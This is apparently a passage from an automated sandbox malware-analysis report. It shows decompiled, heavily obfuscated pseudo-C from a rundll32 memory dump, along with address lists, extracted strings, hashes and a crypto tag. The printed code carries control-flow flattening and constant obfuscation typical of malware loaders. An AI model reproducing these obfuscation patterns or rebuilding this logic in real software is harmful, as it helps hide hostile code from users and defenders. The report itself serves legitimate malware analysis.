				_v132 = _v132 ^ 0x4b658f00;
				_v208 = 0xbd69;
				_t451 = 0x73;
				_v208 = _v208 / _t450;
				_v208 = _v208 + 0x56ba;
				_v208 = _v208 ^ 0x000029ec;
				_v156 = 0x625a;
				_v156 = _v156 + 0xffff65b2;
				_v156 = _v156 ^ 0xffffa807;
				_v176 = 0xc378;
				_v176 = _v176 >> 1;
				_v176 = _v176 + 0x1919;
				_v176 = _v176 ^ 0x00004408;
				_v228 = 0xbfad;
				_v228 = _v228 + 0xffff004b;
				_v228 = _v228 / _t451;
				_t452 = 0x16;
				_v228 = _v228 / _t452;
				_v228 = _v228 ^ 0x0019c242;
				_v264 = 0x218a;
				_v264 = _v264 | 0xaefe0d97;
				_v264 = _v264 + 0x77f0;
				_v264 = _v264 + 0xffffbecb;
				_v264 = _v264 ^ 0xaefe1c0e;
				_v152 = 0x1773;
				_v152 = _v152 + 0x7c73;
				_v152 = _v152 ^ 0x000090c4;
				_v140 = 0xfcb3;
				_v140 = _v140 + 0xffff1dd8;
				_v140 = _v140 ^ 0x00004a86;
				_v252 = 0x9e2f;
				_t453 = 9;
				_v252 = _v252 / _t453;
				_v252 = _v252 << 0xc;
				_v252 = _v252 + 0x6e7b;
				_v252 = _v252 ^ 0x01198ad6;
				_v136 = 0x978d;
				_v136 = _v136 << 0xb;
				_v136 = _v136 ^ 0x04bc6438;
				_v144 = 0xf0b5;
				_t454 = 0x79;
				_v144 = _v144 * 0x51;
				_v144 = _v144 ^ 0x004c2c51;
				_v224 = 0xa482;
				_v224 = _v224 ^ 0xc585cea3;
				_v224 = _v224 / _t454;
				_v224 = _v224 ^ 0x01a18743;
				_v148 = 0xd0a0;
				_v148 = _v148 >> 1;
				_v148 = _v148 ^ 0x000025e7;
				_v232 = 0xead1;
				_v232 = _v232 ^ 0xc3cfbc77;
				_v232 = _v232 | 0xf3c428cf;
				_v232 = _v232 + 0xffff938a;
				_v232 = _v232 ^ 0xf3cf35e7;
				_v160 = 0xb488;
				_v160 = _v160 + 0xf6e2;
				_v160 = _v160 ^ 0x0001c37e;
				_v212 = 0xc903;
				_t455 = 0x1e;
				_v212 = _v212 / _t455;
				_v212 = _v212 ^ 0xfd3886ab;
				_v212 = _v212 ^ 0xfd38fa88;
				_v196 = 0xdd05;
				_v196 = _v196 << 5;
				_v196 = _v196 + 0xdc4b;
				_v196 = _v196 ^ 0x001c7bd6;
				_v200 = 0x4db0;
				_v200 = _v200 ^ 0x1a7afaec;
				_v200 = _v200 >> 8;
				_v200 = _v200 ^ 0x001a5e83;
				_v240 = 0x9d3f;
				_v240 = _v240 >> 8;
				_v240 = _v240 << 9;
				_v240 = _v240 + 0x917a;
				_v240 = _v240 ^ 0x0001a611;
				_v256 = 0x4a86;
				_v256 = _v256 >> 0xd;
				_t456 = 0x55;
				_v256 = _v256 * 0x35;
				_v256 = _v256 + 0xffffab30;
				_v256 = _v256 ^ 0xffffb251;
				_v204 = 0x386;
				_v204 = _v204 / _t456;
				_v204 = _v204 ^ 0xc8309f8e;
				_v204 = _v204 ^ 0xc830cb09;
				_v172 = 0x8769;
				_v172 = _v172 >> 0xe;
				_v172 = _v172 ^ 0x00003b2d;
				_v244 = 0x2b5b;
				_v244 = _v244 + 0xb0ca;
				_v244 = _v244 + 0xd805;
				_v244 = _v244 << 2;
				_v244 = _v244 ^ 0x0006bd06;
				_v184 = 0x1527;
				_v184 = _v184 | 0xeeea078d;
				_t457 = 0x28;
				_v184 = _v184 / _t457;
				_v184 = _v184 ^ 0x05f92fca;
				_v192 = 0x11fc;
				_t458 = 0x16;
				_v192 = _v192 / _t458;
				_v192 = _v192 ^ 0x8895e54e;
				_v192 = _v192 ^ 0x8895ebcd;
				_v168 = 0xe011;
				_v168 = _v168 + 0x4c50;
				_v168 = _v168 ^ 0x0001058b;
				_v216 = 0xf07;
				_t459 = 0x32;
				_v216 = _v216 * 0x36;
				_v216 = _v216 >> 2;
				_v216 = _v216 ^ 0x00008949;
				_v248 = 0xde23;
				_v248 = _v248 + 0xecd9;
				_v248 = _v248 << 0xd;
				_v248 = _v248 ^ 0x1d8b17f5;
				_v248 = _v248 ^ 0x24d4a8d4;
				_v220 = 0x3854;
				_v220 = _v220 | 0x09b0f0f7;
				_v220 = _v220 + 0xe63e;
				_v220 = _v220 ^ 0x09b1b8f3;
				_v188 = 0x295e;
				_v188 = _v188 * 0x23;
				_v188 = _v188 / _t459;
				_v188 = _v188 ^ 0x00001cf4;
				_t460 = _v124;
				while(1) {
					L1:
					_t441 = _v236;
					while(1) {
						L2:
						_t472 = _t461 - 0x299f8b6c;
						if(_t472 <= 0) {
							break;
						}
						if(_t461 == 0x2e2d51e6) {
							_v124 = 0x14;
							_t374 = E00B2F39F(_v244, _v128, _t460 + 0x60,  &_v124, _v184, _v192, _v164, _t403, _v168);
							_t403 = _v268;
							_t470 = _t470 + 0x1c;
							_t441 = _v236;
							if(_t374 == 0) {
								continue;
							}
							_t461 = 0x8f3e942;
							_t403 = 1;
							_v268 = 1;
							L29:
							if(_t461 == 0x33ec2607) {
								L33:
								return _v268;
							}
							while(1) {
								L1:
								_t441 = _v236;
								goto L2;
							}
						}
						if(_t461 == 0x2e332bc4) {
							E00B32674(_v252, _v136, _a4, _t441, _v144, _v224,  *_t468);
							_t470 = _t470 + 0x14;
							_t461 = 0x2452d659;
							L9:
							_t403 = _v268;
							goto L1;
						}
						if(_t461 == 0x2efa85f7) {
							_t377 = _a4 + 1;
							if((_t377 & 0x0000000f) != 0) {
								_t377 = (_t377 & 0xfffffff0) + 0x10;
							}
							 *((intOrPtr*)(_t401 + 4)) = _t377 + 0x74;
							_push(_t403);
							_push(_t403);
							_t460 = E00B28736( *((intOrPtr*)(_t401 + 4)));
							 *_t401 = _t460;
							if(_t460 == 0) {
								goto L33;
							} else {
								_t317 = _t460 + 0x74; // 0x74
								_t441 = _t317;
								_v116 = _a4;
								_t461 = 0x332cf2c2;
								_t403 = _v268;
								_v236 = _t317;
								_v120 =  *((intOrPtr*)(_t401 + 4)) - 0x74;
								continue;
							}
						}
						if(_t461 != 0x332cf2c2) {
							goto L29;
						}
						_t396 =  *0xb3ca20; // 0x0
						_t397 = E00B31B49( &_v128, _v264, _t403,  *((intOrPtr*)(_t396 + 0x2c)), _t403, _v152, _v140);
						_t470 = _t470 + 0x14;
						asm("sbb esi, esi");
						_t461 = ( ~_t397 & 0x0493a058) + 0x299f8b6c;
						goto L9;
					}
					if(_t472 == 0) {
						if(_t403 == 0) {
							E00B2F536(_v156, _v176, _v228,  *_t401);
						}
						goto L33;
					}
					if(_t461 == 0x405be48) {
						_t461 = 0x2efa85f7;
						goto L2;
					}
					if(_t461 == 0x8f3e942) {
						_push(_t403);
						_push(_t403);
						E00B25F43(_t403, _v128);
						_t461 = 0x299f8b6c;
						goto L9;
					}
					if(_t461 == 0x1e33600c) {
						_v112 = 0x6c;
						_t391 =  *0xb3ca20; // 0x0
						_t392 = E00B28010( &_v108,  &_v112, _v188, _v240,  *((intOrPtr*)(_t391 + 0x24)),  *((intOrPtr*)(_t391 + 0x10)), _v256, _v204, _v180, _v172);
						_t470 = _t470 + 0x20;
						if(_t392 == 0) {
							_t461 = 0x8f3e942;
							goto L9;
						}
						_t416 =  &_v1;
						_t448 = _t460;
						do {
							 *_t448 =  *_t416;
							_t448 = _t448 + 1;
							_t416 = _t416 - 1;
						} while (_t416 >=  &_v96);
						_t461 = 0x2e2d51e6;
						goto L9;
					}
					if(_t461 != 0x2452d659) {
						goto L29;
					}
					_t393 =  *0xb3ca20; // 0x0
					_t395 = E00B30A3B(_v120, _v128, _v148, _v232, _v160, _t403,  &_v116, _v212, _v196, _t441, _v200, _t403,  *((intOrPtr*)(_t393 + 0x10)));
					_t470 = _t470 + 0x2c;
					asm("sbb esi, esi");
					_t461 = ( ~_t395 & 0x153f76ca) + 0x8f3e942;
					goto L9;
				}
			}

0x00b2f993
0x00b2f99d
0x00b2f9a4
0x00b2f9a6
0x00b2f9ad
0x00b2f9b4
0x00b2f9b5
0x00b2f9b7
0x00b2f9bc
0x00b2f9c7
0x00b2f9ca
0x00b2f9d9
0x00b2f9db
0x00b2f9e0
0x00b2f9e6
0x00b2f9e9
0x00b2f9ed
0x00b2f9f5
0x00b2fa02
0x00b2fa06
0x00b2fa0e
0x00b2fa16
0x00b2fa1e
0x00b2fa23
0x00b2fa28
0x00b2fa30
0x00b2fa3b
0x00b2fa46
0x00b2fa51
0x00b2fa5f
0x00b2fa60
0x00b2fa66
0x00b2fa6e
0x00b2fa76
0x00b2fa81
0x00b2fa8c
0x00b2fa97
0x00b2fa9f
0x00b2faa3
0x00b2faab
0x00b2fab3
0x00b2fabb
0x00b2facb
0x00b2fad5
0x00b2fada
0x00b2fade
0x00b2fae6
0x00b2faee
0x00b2faf6
0x00b2fafe
0x00b2fb06
0x00b2fb0e
0x00b2fb19
0x00b2fb24
0x00b2fb2f
0x00b2fb3a
0x00b2fb45
0x00b2fb52
0x00b2fb5e
0x00b2fb63
0x00b2fb69
0x00b2fb6e
0x00b2fb76
0x00b2fb7e
0x00b2fb89
0x00b2fb91
0x00b2fb9c
0x00b2fbaf
0x00b2fbb2
0x00b2fbb9
0x00b2fbc4
0x00b2fbcc
0x00b2fbdc
0x00b2fbe0
0x00b2fbe8
0x00b2fbf3
0x00b2fbfa
0x00b2fc05
0x00b2fc0d
0x00b2fc15
0x00b2fc1d
0x00b2fc25
0x00b2fc2d
0x00b2fc38
0x00b2fc43
0x00b2fc4e
0x00b2fc5a
0x00b2fc5f
0x00b2fc65
0x00b2fc6d
0x00b2fc75
0x00b2fc7d
0x00b2fc82
0x00b2fc8a
0x00b2fc92
0x00b2fc9a
0x00b2fca2
0x00b2fca7
0x00b2fcaf
0x00b2fcb7
0x00b2fcbc
0x00b2fcc1
0x00b2fcc9
0x00b2fcd1
0x00b2fcd9
0x00b2fce3
0x00b2fce4
0x00b2fce8
0x00b2fcf0
0x00b2fcf8
0x00b2fd06
0x00b2fd0a
0x00b2fd12
0x00b2fd1a
0x00b2fd22
0x00b2fd27
0x00b2fd2f
0x00b2fd37
0x00b2fd3f
0x00b2fd47
0x00b2fd4c
0x00b2fd54
0x00b2fd5c
0x00b2fd6c
0x00b2fd71
0x00b2fd77
0x00b2fd7f
0x00b2fd8b
0x00b2fd90
0x00b2fd96
0x00b2fd9e
0x00b2fda6
0x00b2fdae
0x00b2fdb6
0x00b2fdbe
0x00b2fdcb
0x00b2fdcc
0x00b2fdd0
0x00b2fdd5
0x00b2fddd
0x00b2fde5
0x00b2fded
0x00b2fdf2
0x00b2fdfa
0x00b2fe02
0x00b2fe0a
0x00b2fe12
0x00b2fe1a
0x00b2fe22
0x00b2fe2f
0x00b2fe39
0x00b2fe3d
0x00b2fe45
0x00b2fe4c
0x00b2fe4c
0x00b2fe4c
0x00b2fe50
0x00b2fe50
0x00b2fe50
0x00b2fe56
0x00000000
0x00000000
0x00b2ff96
0x00b3009f
0x00b300ca
0x00b300cf
0x00b300d3
0x00b300d6
0x00b300dc
0x00000000
0x00000000
0x00b300e4
0x00b300e9
0x00b300ea
0x00b300ee
0x00b300f4
0x00b30117
0x00b30125
0x00b30125
0x00b2fe4c
0x00b2fe4c
0x00b2fe4c
0x00000000
0x00b2fe4c
0x00b2fe4c
0x00b2ffa2
0x00b30082
0x00b30087
0x00b3008a
0x00b2fee7
0x00b2fee7
0x00000000
0x00b2fee7
0x00b2ffae
0x00b30001
0x00b30004
0x00b30009
0x00b30009
0x00b3000f
0x00b30021
0x00b30022
0x00b3002b
0x00b3002d
0x00b30033
0x00000000
0x00b30039
0x00b3003c
0x00b3003c
0x00b30045
0x00b3004c
0x00b30051
0x00b30055
0x00b30059
0x00000000
0x00b30059
0x00b30033
0x00b2ffb6
0x00000000
0x00000000
0x00b2ffca
0x00b2ffdf
0x00b2ffe4
0x00b2ffeb
0x00b2fff3
0x00000000
0x00b2fff3
0x00b2fe5c
0x00b300fd
0x00b30110
0x00b30116
0x00000000
0x00b300fd
0x00b2fe68
0x00b2ff86
0x00000000
0x00b2ff86
0x00b2fe74
0x00b2ff73
0x00b2ff74
0x00b2ff75
0x00b2ff7c
0x00000000
0x00b2ff7c
0x00b2fe80
0x00b2fef4
0x00b2ff19
0x00b2ff2c
0x00b2ff31
0x00b2ff36
0x00b2ff59
0x00000000
0x00b2ff59
0x00b2ff38
0x00b2ff3f
0x00b2ff41
0x00b2ff43
0x00b2ff45
0x00b2ff46
0x00b2ff4e
0x00b2ff52
0x00000000
0x00b2ff52
0x00b2fe88
0x00000000
0x00000000
0x00b2fe8e
0x00b2fecd
0x00b2fed2
0x00b2fed9
0x00b2fee1
0x00000000
0x00b2fee1

Strings

{n, xrefs: 00B2FB6E
>, xrefs: 00B2FE12
), xrefs: 00B2FA6E
^), xrefs: 00B2FE22
l, xrefs: 00B2FEF4
s|, xrefs: 00B2FB19
K, xrefs: 00B2FABB
PL, xrefs: 00B2FDAE
Zb, xrefs: 00B2FA76
-;, xrefs: 00B2FD27
Q-., xrefs: 00B2FF90
Q-., xrefs: 00B2FF52
Q,L, xrefs: 00B2FBB9
SeK, xrefs: 00B2FA3B
%, xrefs: 00B2FBFA
[+, xrefs: 00B2FD2F

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: -;$>$K$PL$Q,L$Zb$[+$^)$l$s|${n$%$)$Q-.$Q-.$SeK
API String ID: 0-11970308
Opcode ID: b9685d6abf2eac1e6f5f1d32beddce0165e096d1f862a95743f68e687e6b06c7
Instruction ID: 8fbd255fc0dfd70dcdf906c13cb76f51bff8467d6e1c07935c5d1fdb67b3c27b
Opcode Fuzzy Hash: b9685d6abf2eac1e6f5f1d32beddce0165e096d1f862a95743f68e687e6b06c7
Instruction Fuzzy Hash: AD1245725083818FD369CF25C889A5BBBF2FBC4314F108A6DF69986260D7B59949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 00B21CFA, Relevance: 19.3, Strings: 15, Instructions: 503
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E00B21CFA(void* __edx, intOrPtr* _a4) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				unsigned int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				unsigned int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				void* __ecx;
				void* _t496;
				void* _t539;
				intOrPtr _t544;
				intOrPtr _t546;
				signed int _t548;
				signed int _t551;
				intOrPtr _t552;
				intOrPtr _t554;
				signed int _t555;
				intOrPtr _t562;
				intOrPtr _t572;
				void* _t574;
				signed int _t577;
				signed int _t578;
				signed int _t579;
				signed int _t580;
				signed int _t581;
				signed int _t582;
				signed int _t583;
				signed int _t584;
				signed int _t585;
				signed int _t586;
				signed int _t587;
				signed int _t588;
				signed int _t589;
				signed int _t590;
				intOrPtr _t591;
				intOrPtr _t592;
				void* _t597;
				intOrPtr _t599;
				intOrPtr _t635;
				intOrPtr _t639;
				void* _t641;
				signed int* _t653;
				void* _t656;

				_t575 = _a4;
				_push(_a4);
				_push(__edx);
				E00B2602B(_t496);
				_v12 = 0x36bdff;
				_t653 =  &(( &_v228)[3]);
				_v8 = 0x3ff2a1;
				_t639 = 0;
				_v4 = 0;
				_v132 = 0xebdb;
				_t641 = 0x15e50797;
				_t577 = 0x54;
				_v132 = _v132 / _t577;
				_v132 = _v132 | 0x22f60655;
				_v132 = _v132 ^ 0x22f660d1;
				_v120 = 0xef02;
				_v120 = _v120 + 0xffff4354;
				_v120 = _v120 + 0xfbd6;
				_v120 = _v120 ^ 0x0001ae28;
				_v52 = 0x7417;
				_v52 = _v52 + 0x1179;
				_v52 = _v52 ^ 0x00000590;
				_v48 = 0x8f30;
				_v48 = _v48 >> 0xf;
				_v64 = 0xc7cd;
				_v64 = _v64 << 0xc;
				_v64 = _v64 ^ 0x0c7cd040;
				_v140 = 0xc967;
				_v140 = _v140 << 0xb;
				_v140 = _v140 | 0xe06bf9c9;
				_v140 = _v140 ^ 0x166bf9c9;
				_v196 = 0x461e;
				_v196 = _v196 | 0x6b692bd6;
				_v196 = _v196 + 0xc0cf;
				_v196 = _v196 + 0xffff0de4;
				_v196 = _v196 ^ 0x6b6977c5;
				_v180 = 0xfff7;
				_t578 = 0x59;
				_v180 = _v180 / _t578;
				_t579 = 0x4d;
				_v180 = _v180 * 0x18;
				_v180 = _v180 | 0x58a6a9da;
				_v180 = _v180 ^ 0x58a6c249;
				_v128 = 0x9f16;
				_v128 = _v128 ^ 0xdade8ffa;
				_v128 = _v128 ^ 0x4c90ffe3;
				_v128 = _v128 ^ 0x964ece00;
				_v92 = 0xcecd;
				_v92 = _v92 + 0x8237;
				_v92 = _v92 / _t579;
				_v92 = _v92 ^ 0x00006f99;
				_v100 = 0x1088;
				_v100 = _v100 << 8;
				_v100 = _v100 << 3;
				_v100 = _v100 ^ 0x0084674e;
				_v108 = 0x5533;
				_v108 = _v108 >> 9;
				_v108 = _v108 | 0xd8fb4233;
				_v108 = _v108 ^ 0xd8fb1bcd;
				_v208 = 0xcae;
				_v208 = _v208 / _t579;
				_t580 = 0x13;
				_v208 = _v208 / _t580;
				_v208 = _v208 >> 0xa;
				_v208 = _v208 ^ 0x00001a16;
				_v216 = 0x40e3;
				_v216 = _v216 | 0x810267c5;
				_v216 = _v216 << 1;
				_v216 = _v216 << 3;
				_v216 = _v216 ^ 0x10267eee;
				_v28 = 0xb673;
				_t581 = 0x3e;
				_v28 = _v28 / _t581;
				_v28 = _v28 ^ 0x0000683f;
				_v40 = 0x9279;
				_v40 = _v40 + 0xffffeab6;
				_v40 = _v40 ^ 0x000054a5;
				_v204 = 0x1c40;
				_v204 = _v204 + 0xffff1f7d;
				_t582 = 0x50;
				_v204 = _v204 / _t582;
				_v204 = _v204 ^ 0x72bb6b9a;
				_v204 = _v204 ^ 0x71887e03;
				_v112 = 0xb897;
				_v112 = _v112 + 0xffffdcba;
				_v112 = _v112 | 0x14aad9bd;
				_v112 = _v112 ^ 0x14aaad8a;
				_v172 = 0xd85f;
				_v172 = _v172 + 0xffff9181;
				_t583 = 0x36;
				_v172 = _v172 * 0x2e;
				_v172 = _v172 + 0x3c74;
				_v172 = _v172 ^ 0x00135ecd;
				_v212 = 0x19f7;
				_v212 = _v212 + 0xffff95e1;
				_v212 = _v212 | 0x04fc32b0;
				_v212 = _v212 << 0xa;
				_v212 = _v212 ^ 0xfeffe01a;
				_v36 = 0x7d37;
				_v36 = _v36 | 0x20ef5b1a;
				_v36 = _v36 ^ 0x20ef0402;
				_v116 = 0xd595;
				_v116 = _v116 / _t583;
				_v116 = _v116 + 0xffffe49c;
				_v116 = _v116 ^ 0xffffa94a;
				_v160 = 0x5e14;
				_v160 = _v160 | 0xdf0c29a2;
				_v160 = _v160 ^ 0xe579e09e;
				_v160 = _v160 + 0xffffde5a;
				_v160 = _v160 ^ 0x3a753154;
				_v68 = 0x52ff;
				_v68 = _v68 >> 8;
				_v68 = _v68 ^ 0x000014f4;
				_v76 = 0x7879;
				_t584 = 0x73;
				_v76 = _v76 / _t584;
				_v76 = _v76 ^ 0x0000054d;
				_v72 = 0x594e;
				_v72 = _v72 ^ 0x61e5003d;
				_v72 = _v72 ^ 0x61e57443;
				_v156 = 0xdc41;
				_v156 = _v156 << 6;
				_v156 = _v156 << 0x10;
				_v156 = _v156 ^ 0x10402e5f;
				_v152 = 0x2cab;
				_v152 = _v152 << 0xc;
				_v152 = _v152 ^ 0xa6d63634;
				_v152 = _v152 ^ 0xa41cdbd3;
				_v24 = 0xfca2;
				_v24 = _v24 >> 0xd;
				_v24 = _v24 ^ 0x000010c7;
				_v96 = 0xe6c1;
				_v96 = _v96 << 0xd;
				_v96 = _v96 + 0xc19f;
				_v96 = _v96 ^ 0x1cd8953a;
				_v224 = 0x49a1;
				_v224 = _v224 ^ 0xfe0521c0;
				_v224 = _v224 + 0x1e0d;
				_v224 = _v224 | 0x46707e16;
				_v224 = _v224 ^ 0xfe759897;
				_v228 = 0x2882;
				_v228 = _v228 << 0x10;
				_v228 = _v228 ^ 0x2e28bbbf;
				_v228 = _v228 | 0x3bec92e5;
				_v228 = _v228 ^ 0x3fee891d;
				_v136 = 0x5ad;
				_v136 = _v136 ^ 0x3d33a635;
				_v136 = _v136 + 0xffff9ac4;
				_v136 = _v136 ^ 0x3d335448;
				_v104 = 0x3c69;
				_v104 = _v104 + 0xf144;
				_t585 = 0x19;
				_v104 = _v104 * 0x1e;
				_v104 = _v104 ^ 0x0023546a;
				_v188 = 0xf300;
				_v188 = _v188 / _t585;
				_v188 = _v188 + 0xffffad26;
				_v188 = _v188 | 0x8105dcb8;
				_v188 = _v188 ^ 0xffffe238;
				_v144 = 0x45c8;
				_v144 = _v144 >> 0xe;
				_v144 = _v144 + 0x45b6;
				_v144 = _v144 ^ 0x000072cd;
				_v192 = 0xd236;
				_v192 = _v192 >> 0x10;
				_t586 = 0x69;
				_v192 = _v192 / _t586;
				_v192 = _v192 ^ 0x176600d6;
				_v192 = _v192 ^ 0x17663ad7;
				_v200 = 0x1b90;
				_v200 = _v200 >> 0xe;
				_v200 = _v200 | 0x00032953;
				_t587 = 0xe;
				_v200 = _v200 * 0x71;
				_v200 = _v200 ^ 0x016540c6;
				_v32 = 0xa5b;
				_v32 = _v32 / _t587;
				_v32 = _v32 ^ 0x00002bda;
				_v56 = 0xbe4e;
				_v56 = _v56 + 0xffffe059;
				_v56 = _v56 ^ 0x0000eaa3;
				_v220 = 0x4321;
				_v220 = _v220 ^ 0x3fa1daa1;
				_v220 = _v220 + 0xffff309f;
				_t588 = 0x24;
				_v220 = _v220 / _t588;
				_v220 = _v220 ^ 0x01c46047;
				_v164 = 0x3944;
				_v164 = _v164 + 0xffff1fd9;
				_t589 = 0x2b;
				_v164 = _v164 * 0x57;
				_v164 = _v164 << 4;
				_v164 = _v164 ^ 0xfc749d64;
				_v148 = 0x7755;
				_v148 = _v148 ^ 0x244775ea;
				_v148 = _v148 | 0xcd3e82a6;
				_v148 = _v148 ^ 0xed7f8152;
				_v88 = 0x40ad;
				_v88 = _v88 >> 0xf;
				_v88 = _v88 ^ 0x000030bd;
				_v80 = 0x9327;
				_v80 = _v80 * 0x70;
				_v80 = _v80 ^ 0x00406c8d;
				_v176 = 0x8ba8;
				_v176 = _v176 + 0x5748;
				_v176 = _v176 + 0xffffe08a;
				_v176 = _v176 + 0xffffcf91;
				_v176 = _v176 ^ 0x0000bf1e;
				_v124 = 0xe985;
				_v124 = _v124 ^ 0x9cf6d459;
				_v124 = _v124 + 0xffffb832;
				_v124 = _v124 ^ 0x9cf5d440;
				_v184 = 0xee13;
				_v184 = _v184 / _t589;
				_v184 = _v184 ^ 0x973ecc13;
				_t590 = 0x6a;
				_v184 = _v184 / _t590;
				_v184 = _v184 ^ 0x016d24ef;
				_v84 = 0xbcf1;
				_v84 = _v84 ^ 0x64b03ea8;
				_v84 = _v84 ^ 0x64b0e2a8;
				_v60 = 0x8a4f;
				_v60 = _v60 | 0x8c15d5a4;
				_v60 = _v60 ^ 0x8c14dfef;
				_v44 = 0x30ef;
				_v44 = _v44 + 0xffffe2a4;
				_v44 = _v44 ^ 0x00001380;
				_v168 = 0xbe5e;
				_v168 = _v168 << 0x10;
				_v168 = _v168 | 0x5aa68a8d;
				_v168 = _v168 + 0xffff34cf;
				_v168 = _v168 ^ 0xfefdbf5d;
				goto L1;
				do {
					while(1) {
						L1:
						_t656 = _t641 - 0x2e2ba50c;
						if(_t656 > 0) {
							break;
						}
						if(_t656 == 0) {
							_push(_t590);
							_push(_t590);
							_t591 =  *0xb3ca20; // 0x0
							_t590 = _t591 + 0x18;
							_t551 = E00B2C46E(_t590, _v208, _v216, _v28, _v140 | _v64, _t590, _v40);
							_t653 =  &(_t653[7]);
							asm("sbb esi, esi");
							_t641 = ( ~_t551 & 0xf61d5154) + 0x3b32afa9;
							continue;
						} else {
							if(_t641 == 0xfdb1f24) {
								_t552 =  *0xb3ca20; // 0x0
								_t554 =  *0xb3ca20; // 0x0
								_t555 = E00B2F292(_v72, _v156,  *((intOrPtr*)(_t554 + 0x18)), _v152, _v20, _v24, _t590, _v16, _t552 + 0x24, _t590, _v96);
								_t590 = _v224;
								asm("sbb esi, esi");
								_t641 = ( ~_t555 & 0x1a4c73ed) + 0x1af0d9d8;
								E00B39465(_t590, _v20, _v228);
								_t653 =  &(_t653[0xa]);
								goto L27;
							} else {
								if(_t641 == 0x15e50797) {
									_push(_t590);
									_t597 = 0x34;
									_t562 = E00B28736(_t597);
									 *0xb3ca20 = _t562;
									_t590 = _t590;
									if(_t562 != 0) {
										_t641 = 0x2e2ba50c;
										continue;
									}
								} else {
									if(_t641 == 0x1af0d9d8) {
										_t599 =  *0xb3ca20; // 0x0
										_t590 =  *(_t599 + 0x18);
										E00B287FA(_t590);
										_t653 = _t653 - 0x10 + 0x10;
										_t641 = 0x3b32afa9;
										continue;
									} else {
										if(_t641 == 0x1f84fef1) {
											_t572 =  *0xb3ca20; // 0x0
											_push(_t590);
											_push(_t590);
											E00B3AB25(_t590,  *((intOrPtr*)(_t572 + 0x24)));
											_t653 =  &(_t653[3]);
											_t641 = 0x1af0d9d8;
											continue;
										} else {
											if(_t641 != 0x2135b5bc) {
												goto L27;
											} else {
												_t635 =  *0xb3ca20; // 0x0
												_t437 = _t635 + 0x2c; // 0x2c
												_t590 = _t437;
												_t574 = E00B31A1F(_t590,  *((intOrPtr*)(_t635 + 0x18)), _v220, _v120, _v164, _v148, _t590, _v88, _t590, _v80);
												_t653 =  &(_t653[8]);
												if(_t574 != 0) {
													_t639 = 1;
												} else {
													_t641 = 0x3151f296;
													continue;
												}
											}
										}
									}
								}
							}
						}
						L21:
						return _t639;
					}
					if(_t641 == 0x315000fd) {
						_t590 = _v36;
						_t539 = E00B275AE(_t590,  *_t575, _t590,  &_v20, _v44, _v116,  *((intOrPtr*)(_t575 + 4)),  &_v16, _v160, _v52, _v168 | _v60, _v68, _v76);
						_t653 =  &(_t653[0xb]);
						if(_t539 == 0) {
							_t641 = 0x1af0d9d8;
							goto L27;
						} else {
							_t641 = 0xfdb1f24;
							goto L1;
						}
					} else {
						if(_t641 == 0x3151f296) {
							_t544 =  *0xb3ca20; // 0x0
							_push(_t590);
							_push(_t590);
							E00B3AB25(_t590,  *((intOrPtr*)(_t544 + 0x10)));
							_t653 =  &(_t653[3]);
							_t641 = 0x1f84fef1;
							goto L1;
						} else {
							if(_t641 == 0x353d4dc5) {
								_t546 =  *0xb3ca20; // 0x0
								_t592 =  *0xb3ca20; // 0x0
								_t590 =  *(_t592 + 0x18);
								_t548 = E00B266C9(_t590, _v48, _v132, _t546 + 0x10, _v192, _v200, _v32, _v56);
								_t653 =  &(_t653[6]);
								asm("sbb esi, esi");
								_t641 = ( ~_t548 & 0x01b0b6cb) + 0x1f84fef1;
								goto L1;
							} else {
								if(_t641 != 0x3b32afa9) {
									goto L27;
								} else {
									E00B2F536(_v92, _v100, _v108,  *0xb3ca20);
								}
							}
						}
					}
					goto L21;
					L27:
				} while (_t641 != 0x5edb69a);
				goto L21;
			}

0x00b21d01
0x00b21d0b
0x00b21d0c
0x00b21d0e
0x00b21d13
0x00b21d1e
0x00b21d21
0x00b21d2c
0x00b21d2e
0x00b21d37
0x00b21d3f
0x00b21d4a
0x00b21d4f
0x00b21d55
0x00b21d5d
0x00b21d65
0x00b21d70
0x00b21d7b
0x00b21d86
0x00b21d91
0x00b21d9c
0x00b21da7
0x00b21db2
0x00b21dbd
0x00b21dd3
0x00b21dde
0x00b21de6
0x00b21df1
0x00b21df9
0x00b21dfe
0x00b21e06
0x00b21e0e
0x00b21e16
0x00b21e1e
0x00b21e26
0x00b21e2e
0x00b21e36
0x00b21e42
0x00b21e47
0x00b21e52
0x00b21e53
0x00b21e57
0x00b21e5f
0x00b21e67
0x00b21e6f
0x00b21e77
0x00b21e7f
0x00b21e87
0x00b21e92
0x00b21ea6
0x00b21ead
0x00b21eb8
0x00b21ec3
0x00b21ecb
0x00b21ed3
0x00b21ede
0x00b21ee9
0x00b21ef1
0x00b21efc
0x00b21f07
0x00b21f19
0x00b21f23
0x00b21f28
0x00b21f2e
0x00b21f33
0x00b21f3b
0x00b21f43
0x00b21f4b
0x00b21f4f
0x00b21f54
0x00b21f5c
0x00b21f6e
0x00b21f73
0x00b21f7c
0x00b21f87
0x00b21f92
0x00b21f9d
0x00b21fa8
0x00b21fb0
0x00b21fbc
0x00b21fc1
0x00b21fc7
0x00b21fcf
0x00b21fd7
0x00b21fe2
0x00b21fed
